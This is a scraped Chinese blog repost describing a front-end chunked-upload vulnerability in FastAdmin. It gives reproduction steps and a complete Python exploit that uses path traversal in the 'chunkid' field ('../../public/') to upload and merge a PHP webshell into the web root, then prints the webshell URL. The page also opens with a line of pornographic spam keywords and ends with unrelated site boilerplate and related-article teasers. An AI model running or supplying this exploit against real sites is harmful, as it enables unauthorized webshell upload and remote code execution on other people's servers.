国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

fastadmin前臺分片漏洞

這篇具有很好參考價值的文章主要介紹了fastadmin前臺分片漏洞。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

參考鏈接:

fastadmin安裝

fastadmin安裝

前臺分片漏洞復現(xiàn):

https://blog.csdn.net/weixin_43288600/article/details/121192252

https://blog.csdn.net/u013921288/article/details/117670844

https://xz.aliyun.com/t/9395

FastAdmin最新RCE漏洞復現(xiàn)

https://www.secpulse.com/archives/157307.html

搭建好環(huán)境后,查看服務(wù)器ip:

fastadmin前臺分片漏洞

注冊賬號,在上傳頁面進行抓包:

數(shù)據(jù)包如下:

fastadmin前臺分片漏洞

發(fā)送到repeater:

fastadmin前臺分片漏洞

構(gòu)造分片數(shù)據(jù)包并發(fā)送:

fastadmin前臺分片漏洞

fastadmin前臺分片漏洞

可以發(fā)現(xiàn)在chunk文件夾下發(fā)現(xiàn)php文件已經(jīng)成功上傳。

fastadmin前臺分片漏洞

測試發(fā)現(xiàn),設(shè)定網(wǎng)站的根目錄為?/public?之后就無法訪問 ?runtime/chunks?下的文件,因此將上傳文件路徑改為

fastadmin前臺分片漏洞

再次發(fā)送數(shù)據(jù)包,在根目錄下成功上傳文件:

fastadmin前臺分片漏洞

訪問成功,可以顯示php文件中的內(nèi)容。

fastadmin前臺分片漏洞

撰寫利用代碼并在kali中執(zhí)行:

fastadmin前臺分片漏洞

瀏覽器訪問webshel路徑

fastadmin前臺分片漏洞

Webshell上傳成功

exp:文章來源地址http://www.zghlxwxcb.cn/news/detail-466028.html

import sys
import requests
from time import time
from json import loads

headers = {
	'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36',
}

def banner():
	RED = '\033[31m'
	print(f"""
		{RED}  _____         _      _       _           _       
 |  ___|_ _ ___| |_   / \   __| |_ __ ___ (_)_ __  
 | |_ / _` / __| __| / _ \ / _` | '_ ` _ \| | '_ \ 
 |  _| (_| \__ \ |_ / ___ \ (_| | | | | | | | | | |
 |_|  \__,_|___/\__/_/   \_\__,_|_| |_| |_|_|_| |_|
                         Author: Search?=Null                          
	""")

def upload_chunk(url):
	upload_url = url.rstrip('/') + '/index/ajax/upload'
	file = {
		'file': ('%d.php' % time(), open('hhh.php', 'rb'), 'application/octet-stream')
	}
	chunk_id = time()
	data_ = {
		'chunkid': '../../public/%d.php' % chunk_id,
		'chunkindex': 0,
		'chunkcount': 1
	}
	resp = requests.post(
		upload_url,
		headers = headers,
		files = file,
		data = data_
	)
	result = loads(resp.text)
	if result['code'] == 1 and result['msg'] == '' and result['data'] == None:
		merge_file(upload_url, chunk_id)
		print('\nWebshell: %s/%d.php' % (url.rstrip('/'), chunk_id))
	elif result['msg'] != '':
                print(f"Not Vulnerability, {result['msg']}.")
	else:
		print('Not Vulnerability.')

def merge_file(url, chunk_id):
	data_ = {
		'action': 'merge',
		'chunkid': '../../public/%d.php' % chunk_id,
		'chunkindex': 0,
		'chunkcount': 1,
		'filename': '%d.php-0.part' % chunk_id
	}
	resp = requests.post(
		url,
		headers = headers,
		data = data_
	)

def main():
	global headers
	banner()
	if len(sys.argv) == 2:
		try:
			headers['Cookie'] = input('Cookie > ')
			upload_chunk(sys.argv[1])
		except Exception as e:
			print(e)
	else:
		print('Usage: python3 FastAdmin.py url')

if __name__ == "__main__":
	main()

到了這里,關(guān)于fastadmin前臺分片漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • Jeecg-Boot 存在前臺SQL注入漏洞(CVE-2023-1454)

    微信公眾號搜索:南風漏洞復現(xiàn)文庫 南風網(wǎng)絡(luò)安全公眾號首發(fā) eecgBoot是一款基于BPM的低代碼平臺!前后端分離架構(gòu) SpringBoot 2.x,SpringCloud,Ant DesignVue,Mybatis-plus,Shiro,JWT,支持微服務(wù)。強大的代碼生成器讓前后端代碼一鍵生成,實現(xiàn)低代碼開發(fā)#x

    2024年02月06日
    瀏覽(188)
  • 【Nginx34】Nginx學習:安全鏈接、范圍分片以及請求分流模塊

    【Nginx34】Nginx學習:安全鏈接、范圍分片以及請求分流模塊

    又迎來新的模塊了,今天的內(nèi)容不多,但我們都進行了詳細的測試,所以可能看起來會多一點哦。這三個模塊之前也從來都沒用過,但是通過學習之后發(fā)現(xiàn),貌似還都挺有用。當然,還是要根據(jù)具體業(yè)務(wù)情況來看,如果你的業(yè)務(wù)中有用到,那么就可以嘗試一下哦。 安全鏈接是

    2024年02月07日
    瀏覽(16)
  • Office E5 OneDrive API使用指南:注冊+密鑰獲取+獲取臨時上傳鏈接+分片

    Office E5 OneDrive API使用指南:注冊+密鑰獲取+獲取臨時上傳鏈接+分片

    異想之旅:本人原創(chuàng)博客完全手敲,絕對非搬運,全網(wǎng)不可能有重復;本人無團隊,僅為技術(shù)愛好者進行分享,所有內(nèi)容不牽扯廣告。本人所有文章僅在CSDN、掘金和個人博客(一定是異想之旅域名)發(fā)布,除此之外全部是盜文! 本文主要講解的是自己注冊了一個 E5 開發(fā)者賬

    2024年02月04日
    瀏覽(28)
  • Zotero在word中插入帶超鏈接的參考文獻/交叉引用/跳轉(zhuǎn)參考文獻

    Zotero以其豐富的插件而聞名,使用起來十分的帶勁,最重要的是它是免費的、不卡頓,不像某專業(yè)軟件。 然而Zotero在word插入?yún)⒖嘉墨I時,無法為參考文獻添加超鏈接,這是一個不得不提的遺憾。 不過,有大佬已經(jīng)寫出了基于Word VBA語言的代碼,可以為Zotero在Word中的參考文獻

    2024年02月02日
    瀏覽(34)
  • 漏洞等級標準參考建議

    SRC漏洞定級標準 分資產(chǎn),核心資產(chǎn),一般資產(chǎn),邊緣資產(chǎn) 嚴重漏洞: 1.不需要登錄直接獲取設(shè)備root權(quán)限的漏洞,包括但不限于上傳Webshell,任意代碼執(zhí)行,遠程命令執(zhí)行等 2.不需要登錄直接導致嚴重的信息泄露漏洞,包括但不限于重要數(shù)據(jù)庫的SQL注入、系統(tǒng)權(quán)限控制不嚴格

    2024年02月08日
    瀏覽(12)
  • WEB漏洞-XSS跨站腳本漏洞解決方案參考

    WEB漏洞-XSS跨站腳本漏洞解決方案-CSDN博客 Java使用過濾器防止XSS腳本注入_防注入 參數(shù)過濾-CSDN博客

    2024年02月01日
    瀏覽(17)
  • 漏洞掃描神器:Netsparker 保姆級教程(附鏈接)

    漏洞掃描神器:Netsparker 保姆級教程(附鏈接)

    Netsparker是一款專業(yè)的網(wǎng)絡(luò)安全掃描工具,用于自動化地發(fā)現(xiàn)和修復網(wǎng)站和Web應(yīng)用程序中的安全漏洞。它提供了全面的安全測試,包括SQL注入、跨站腳本攻擊、遠程文件包含、命令注入等常見的安全漏洞。 Netsparker具有以下特點: 自動化掃描:Netsparker能夠自動掃描網(wǎng)站和Web應(yīng)

    2024年04月11日
    瀏覽(18)
  • 干貨 | 6款漏掃工具來了(附工具下載鏈接)_ip漏洞掃描工具

    干貨 | 6款漏掃工具來了(附工具下載鏈接)_ip漏洞掃描工具

    滲透測試收集信息完成后,就要根據(jù)所收集的信息,掃描目標站點可能存在的漏洞了,包括我們之前提到過的如:SQL注入漏洞、跨站腳本漏洞、文件上傳漏洞、文件包含漏洞及命令執(zhí)行漏洞等,通過這些已知的漏洞,來尋找目標站點的突破口,在這之前我們可能就已經(jīng)接觸過

    2024年02月21日
    瀏覽(27)
  • 【Python小技巧】使用必殺技一鍵安裝Ta-lib(其它第三方庫裝不上的也可以參考,鏈接下載不了可通過文中CSDN資源下載)

    【Python小技巧】使用必殺技一鍵安裝Ta-lib(其它第三方庫裝不上的也可以參考,鏈接下載不了可通過文中CSDN資源下載)

    最近升級了電腦系統(tǒng),換了個nvme的ssd,系統(tǒng)裝了win11。界面很清爽,心情不錯。安裝了最新版本的Anaconda,Python也更新到3.10版本,環(huán)境都配置好了,但新裝系統(tǒng)后,很多都需要重新配置。由于頻繁需要使用到股票行情的指標計算,Ta-lib是必不可少的。但沒想到安裝依舊報錯。

    2024年02月07日
    瀏覽(28)
  • 安裝FastAdmin時報1146 Table 'fastadmin.fa_admin' doesn't exist錯誤

    Fastadmin的安裝 安裝路徑 /public/install.php 有部分小伙伴在安裝FastAdmin時報以下錯誤 SQLSTATE[42S02]: Base table or view not found: 1146 Table \\\'fastadmin.fa_admin\\\' doesn\\\'t exist 這基本上是由于你的數(shù)據(jù)庫不支持Innodb引擎造成的。 解決辦法: 打開Mysql配置文件,找到 skip-innodb 項,將其改成 #skip-inno

    2024年02月03日
    瀏覽(26)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包